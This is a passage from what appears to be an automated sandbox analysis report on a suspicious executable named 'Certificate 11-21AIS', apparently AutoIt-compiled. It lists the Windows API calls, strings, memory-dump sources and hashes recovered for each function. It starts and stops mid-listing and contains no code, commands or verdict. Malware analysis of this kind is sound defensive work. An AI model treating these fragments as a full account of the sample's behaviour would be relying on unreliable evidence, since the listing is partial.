                                                                              • DragQueryPoint.SHELL32(?,?), ref: 0092F37A
                                                                                • Part of subcall function 0092D7DE: ClientToScreen.USER32(?,?), ref: 0092D807
                                                                                • Part of subcall function 0092D7DE: GetWindowRect.USER32(?,?), ref: 0092D87D
                                                                                • Part of subcall function 0092D7DE: PtInRect.USER32(?,?,0092ED5A), ref: 0092D88D
                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0092F3E3
                                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0092F3EE
                                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0092F411
                                                                              • _wcscat.LIBCMT ref: 0092F441
                                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0092F458
                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0092F471
                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0092F488
                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0092F4AA
                                                                              • DragFinish.SHELL32(?), ref: 0092F4B1
                                                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0092F59C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                              • API String ID: 169749273-3440237614
                                                                              • Opcode ID: 138d77c0f6f119e97d468b922c57448c833971d62d631cfd630b0a61375ddde5
                                                                              • Instruction ID: 7a61d38ca59fcf62ec06875ae2133b3a2328ed3eb480e5c65eb0713805496bd9
                                                                              • Opcode Fuzzy Hash: 138d77c0f6f119e97d468b922c57448c833971d62d631cfd630b0a61375ddde5
                                                                              • Instruction Fuzzy Hash: 7E613A76108300AFC711EF64DC85E9BBBF8FF89714F004A2EF595921A1DB709A09CB52
                                                                              APIs
                                                                              • VariantInit.OLEAUT32(00000000), ref: 0090AB3D
                                                                              • VariantCopy.OLEAUT32(?,?), ref: 0090AB46
                                                                              • VariantClear.OLEAUT32(?), ref: 0090AB52
                                                                              • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0090AC40
                                                                              • __swprintf.LIBCMT ref: 0090AC70
                                                                              • VarR8FromDec.OLEAUT32(?,?), ref: 0090AC9C
                                                                              • VariantInit.OLEAUT32(?), ref: 0090AD4D
                                                                              • SysFreeString.OLEAUT32(00000016), ref: 0090ADDF
                                                                              • VariantClear.OLEAUT32(?), ref: 0090AE35
                                                                              • VariantClear.OLEAUT32(?), ref: 0090AE44
                                                                              • VariantInit.OLEAUT32(00000000), ref: 0090AE80
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                              • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                              • API String ID: 3730832054-3931177956
                                                                              • Opcode ID: 1b1f4a1e74e53077a7c51111e05cc0fa9b92ff0696f30b8de6e118728124dbfc
                                                                              • Instruction ID: dd465b6d647bb6e503a6e0e7aff3f0bc7d373b6b0d748be787381e45256be831
                                                                              • Opcode Fuzzy Hash: 1b1f4a1e74e53077a7c51111e05cc0fa9b92ff0696f30b8de6e118728124dbfc
                                                                              • Instruction Fuzzy Hash: A7D1BE71A04315DFDB209F69C885B6AB7B9FF05B00F148965E4059B2D1DB78EC80EBE2
                                                                              APIs
                                                                              • CharUpperBuffW.USER32(?,?), ref: 009271FC
                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00927247
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharMessageSendUpper
                                                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                              • API String ID: 3974292440-4258414348
                                                                              • Opcode ID: b0f3225e41d23ca0aed7650f0a1db9452ce4bb74c68f8c716094aad14aaa2130
                                                                              • Instruction ID: b16a182c101f83db579a548d409b09beb39e3e69f6307677b2066df06b6b5f18
                                                                              • Opcode Fuzzy Hash: b0f3225e41d23ca0aed7650f0a1db9452ce4bb74c68f8c716094aad14aaa2130
                                                                              • Instruction Fuzzy Hash: CA914C342087159BCA04EF68D451A6AF7A5FF94310F00495DF996AB3A7DB34ED0ACB82
                                                                              APIs
                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0092E5AB
                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00929808,?), ref: 0092E607
                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0092E647
                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0092E68C
                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0092E6C3
                                                                              • FreeLibrary.KERNEL32(?,00000004,?,?,?,00929808,?), ref: 0092E6CF
                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0092E6DF
                                                                              • DestroyIcon.USER32(?), ref: 0092E6EE
                                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0092E70B
                                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0092E717
                                                                                • Part of subcall function 008E0FA7: __wcsicmp_l.LIBCMT ref: 008E1030
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                              • String ID: .dll$.exe$.icl
                                                                              • API String ID: 1212759294-1154884017
                                                                              • Opcode ID: 989b998a05688fc1f2d5653f190e0f7fa2d1ad14964467b8bbf8a23cb225d9a3
                                                                              • Instruction ID: f5abc40d3aa096254e4e608fef9c0ef8f6722a120fbb744179889639ec8d0053
                                                                              • Opcode Fuzzy Hash: 989b998a05688fc1f2d5653f190e0f7fa2d1ad14964467b8bbf8a23cb225d9a3
                                                                              • Instruction Fuzzy Hash: AC61F071510229BAEB24DF68DC86FBE7BACFB19714F104505F915D61D0EBB4E980CBA0
                                                                              APIs
                                                                                • Part of subcall function 008C936C: __swprintf.LIBCMT ref: 008C93AB
                                                                                • Part of subcall function 008C936C: __itow.LIBCMT ref: 008C93DF
                                                                              • CharLowerBuffW.USER32(?,?), ref: 0090D292
                                                                              • GetDriveTypeW.KERNEL32 ref: 0090D2DF
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0090D327
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0090D35E
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0090D38C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                              • API String ID: 1148790751-4113822522
                                                                              • Opcode ID: 4b4aca122276adce4efb3ab1edfafba1474b56b00345a3c4ae5e3a750b346b9f
                                                                              • Instruction ID: 7bdf4fcbe5467b412431b2a571ba3e4f778043b181f8d12131e3767e2ca71b82
                                                                              • Opcode Fuzzy Hash: 4b4aca122276adce4efb3ab1edfafba1474b56b00345a3c4ae5e3a750b346b9f
                                                                              • Instruction Fuzzy Hash: B15118751142059FC704EF28C882E6AB7F8FF98758F04896DF899A7291DB31EE05CB52
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00933973,00000016,0000138C,00000016,?,00000016,0095DDB4,00000000,?), ref: 009026F1
                                                                              • LoadStringW.USER32(00000000,?,00933973,00000016), ref: 009026FA
                                                                              • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00933973,00000016,0000138C,00000016,?,00000016,0095DDB4,00000000,?,00000016), ref: 0090271C
                                                                              • LoadStringW.USER32(00000000,?,00933973,00000016), ref: 0090271F
                                                                              • __swprintf.LIBCMT ref: 0090276F
                                                                              • __swprintf.LIBCMT ref: 00902780
                                                                              • _wprintf.LIBCMT ref: 00902829
                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00902840
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                              • API String ID: 618562835-2268648507
                                                                              • Opcode ID: a850d47d5784ee7b5e21c490788980cc5c5a299862facd638dc200459ff21925
                                                                              • Instruction ID: aed21cc2620a9b898b283e6f0d27b6cd1e7bc9d870a79a130c545863d7d6febf
                                                                              • Opcode Fuzzy Hash: a850d47d5784ee7b5e21c490788980cc5c5a299862facd638dc200459ff21925
                                                                              • Instruction Fuzzy Hash: A6413072800219AACF14FBD4DD8AEEEB778FF55344F504069F505B2092EA34AF49DB62
                                                                              APIs
                                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0090D0D8
                                                                              • __swprintf.LIBCMT ref: 0090D0FA
                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 0090D137
                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0090D15C
                                                                              • _memset.LIBCMT ref: 0090D17B
                                                                              • _wcsncpy.LIBCMT ref: 0090D1B7
                                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0090D1EC
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0090D1F7
                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 0090D200
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0090D20A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                              • String ID: :$\$\??\%s
                                                                              • API String ID: 2733774712-3457252023
                                                                              • Opcode ID: cb12511301bd81949b8bff7e440985a0fa994a431847465fe860b8c9e41c7f83
                                                                              • Instruction ID: c68aaa010d593c3eb8292725f863e51d5ef71ecc95fb01cbf227047e502b48fd
                                                                              • Opcode Fuzzy Hash: cb12511301bd81949b8bff7e440985a0fa994a431847465fe860b8c9e41c7f83
                                                                              • Instruction Fuzzy Hash: 3531C1BA515109ABDB21DFA4CC48FEF37BCEF8A704F1040B6F519D21A1EB7096449B25
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                                              • String ID:
                                                                              • API String ID: 884005220-0
                                                                              • Opcode ID: c366eeca6c7fe0dc3c908e36ee2a676ae530df49cf5de977739489798d160af2
                                                                              • Instruction ID: 75372771f485f5ed7f31a1c650c13536a851cac54f13f8415295dce41e9cb35d
                                                                              • Opcode Fuzzy Hash: c366eeca6c7fe0dc3c908e36ee2a676ae530df49cf5de977739489798d160af2
                                                                              • Instruction Fuzzy Hash: 2961E132A14219EFDB21AF39DC467793BA4FF117A4F200125EA15EB281EF74CD408B96
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 0092E754
                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0092E76B
                                                                              • GlobalAlloc.KERNEL32(00000002,00000000), ref: 0092E776
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0092E783
                                                                              • GlobalLock.KERNEL32(00000000), ref: 0092E78C
                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0092E79B
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0092E7A4
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0092E7AB
                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0092E7BC
                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,0094D9BC,?), ref: 0092E7D5
                                                                              • GlobalFree.KERNEL32(00000000), ref: 0092E7E5
                                                                              • GetObjectW.GDI32(?,00000018,000000FF), ref: 0092E809
                                                                              • CopyImage.USER32(?,00000000,?,?,00002000), ref: 0092E834
                                                                              • DeleteObject.GDI32(00000000), ref: 0092E85C
                                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0092E872
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                              • String ID:
                                                                              • API String ID: 3840717409-0
                                                                              • Opcode ID: 21f1c1a3aff677bf436d67badd95215302019431147c304290016e65c7b4de84
                                                                              • Instruction ID: 2922effea24d2951d4542b3c5bcb718686ae90538b1d942d6e17f376ca745336
                                                                              • Opcode Fuzzy Hash: 21f1c1a3aff677bf436d67badd95215302019431147c304290016e65c7b4de84
                                                                              • Instruction Fuzzy Hash: 30414979611214EFDB119F65DC88EAA7BBCEF8AB15F108058F916D7260C7709D40EB60
                                                                              APIs
                                                                              • __wsplitpath.LIBCMT ref: 0091076F
                                                                              • _wcscat.LIBCMT ref: 00910787
                                                                              • _wcscat.LIBCMT ref: 00910799
                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009107AE
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 009107C2
                                                                              • GetFileAttributesW.KERNEL32(?), ref: 009107DA
                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 009107F4
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00910806
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                              • String ID: *.*
                                                                              • API String ID: 34673085-438819550
                                                                              • Opcode ID: 6cde16be3219616e6ed63800d86545866df453083fe4a965b52a4763f4c8d126
                                                                              • Instruction ID: 0bf115768106ee290b2dabc8abbdd4d0f339cd9e0810cf33435afe77c3de510a
                                                                              • Opcode Fuzzy Hash: 6cde16be3219616e6ed63800d86545866df453083fe4a965b52a4763f4c8d126
                                                                              • Instruction Fuzzy Hash: 8A81A1716083499FCB20DF28C8459AEB7E8FBC9344F148D2EF885C7250EA76D9D48B52
                                                                              APIs
                                                                                • Part of subcall function 008DB34E: GetWindowLongW.USER32(?,000000EB), ref: 008DB35F
                                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0092EF3B
                                                                              • GetFocus.USER32 ref: 0092EF4B
                                                                              • GetDlgCtrlID.USER32(00000000), ref: 0092EF56
                                                                              • _memset.LIBCMT ref: 0092F081
                                                                              • GetMenuItemInfoW.USER32 ref: 0092F0AC
                                                                              • GetMenuItemCount.USER32(00000000), ref: 0092F0CC
                                                                              • GetMenuItemID.USER32(?,00000000), ref: 0092F0DF
                                                                              • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0092F113
                                                                              • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0092F15B
                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0092F193
                                                                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0092F1C8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                              • String ID: 0
                                                                              • API String ID: 1296962147-4108050209
                                                                              • Opcode ID: a2b5392be305809c504e38bbf7fdfb1645ba6815774b42c21d9af2951f9589e9
                                                                              • Instruction ID: f45d03c5037d760c06615bd2839e26aa011b819553143ef5b3b6f1f6908eebb0
                                                                              • Opcode Fuzzy Hash: a2b5392be305809c504e38bbf7fdfb1645ba6815774b42c21d9af2951f9589e9
                                                                              • Instruction Fuzzy Hash: 9E819C74509321AFD720DF14E894A6BBBF8FB88314F00093EF99897296D730D815CB92
                                                                              APIs
                                                                                • Part of subcall function 008FABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 008FABD7
                                                                                • Part of subcall function 008FABBB: GetLastError.KERNEL32(?,008FA69F,?,?,?), ref: 008FABE1
                                                                                • Part of subcall function 008FABBB: GetProcessHeap.KERNEL32(00000008,?,?,008FA69F,?,?,?), ref: 008FABF0
                                                                                • Part of subcall function 008FABBB: HeapAlloc.KERNEL32(00000000,?,008FA69F,?,?,?), ref: 008FABF7
                                                                                • Part of subcall function 008FABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 008FAC0E
                                                                                • Part of subcall function 008FAC56: GetProcessHeap.KERNEL32(00000008,008FA6B5,00000000,00000000,?,008FA6B5,?), ref: 008FAC62
                                                                                • Part of subcall function 008FAC56: HeapAlloc.KERNEL32(00000000,?,008FA6B5,?), ref: 008FAC69
                                                                                • Part of subcall function 008FAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,008FA6B5,?), ref: 008FAC7A
                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 008FA8CB
                                                                              • _memset.LIBCMT ref: 008FA8E0
                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 008FA8FF
                                                                              • GetLengthSid.ADVAPI32(?), ref: 008FA910
                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 008FA94D
                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008FA969
                                                                              • GetLengthSid.ADVAPI32(?), ref: 008FA986
                                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 008FA995
                                                                              • HeapAlloc.KERNEL32(00000000), ref: 008FA99C
                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 008FA9BD
                                                                              • CopySid.ADVAPI32(00000000), ref: 008FA9C4
                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 008FA9F5
                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008FAA1B
                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 008FAA2F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                              • String ID:
                                                                              • API String ID: 3996160137-0
                                                                              • Opcode ID: 46eb0f3ebc0613040aeb73fe7c9c04cec7feb0bdd59891db25402de6c0ffd03e
                                                                              • Instruction ID: 38db8fe83eb7c9ebe6e293f683673ddc8d6625782cb5b98b41c93797960da0b5
                                                                              • Opcode Fuzzy Hash: 46eb0f3ebc0613040aeb73fe7c9c04cec7feb0bdd59891db25402de6c0ffd03e
                                                                              • Instruction Fuzzy Hash: AC514BB9900219ABDF18CFA4DC44EFEBBB9FF05310F048129EA15E7290D7319A05DB61
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 00919E36
                                                                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00919E42
                                                                              • CreateCompatibleDC.GDI32(?), ref: 00919E4E
                                                                              • SelectObject.GDI32(00000000,?), ref: 00919E5B
                                                                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00919EAF
                                                                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00919EEB
                                                                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00919F0F
                                                                              • SelectObject.GDI32(00000006,?), ref: 00919F17
                                                                              • DeleteObject.GDI32(?), ref: 00919F20
                                                                              • DeleteDC.GDI32(00000006), ref: 00919F27
                                                                              • ReleaseDC.USER32(00000000,?), ref: 00919F32
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
